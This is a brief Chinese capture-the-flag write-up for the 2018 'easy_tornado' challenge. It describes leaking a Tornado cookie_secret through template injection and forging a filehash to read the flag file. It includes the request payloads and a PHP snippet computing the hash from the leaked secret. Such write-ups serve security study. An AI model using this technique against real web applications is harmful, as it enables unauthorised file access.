[护网杯 2018]easy_tornado

打开网站

文件内容

/flag.txt

/wecome.txt

/hints/txt

url发现文件包含

不加filehash参数会爆错

filehash的值应该是hints.txt文件中的计算式得到的

但是cookie_secret在哪里找？
welcome.txt文件中有render？？？
存在模板注入

payload

?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))

?filename=/fllllllllllllag&filehash=b3a0bf12f5f3b27133df5ec19c09351e

<?php
$str1 = md5("/fllllllllllllag");
$str =  md5("120cd284-eb54-422b-829e-2969cebb5e18".$str1);
echo $str;
?>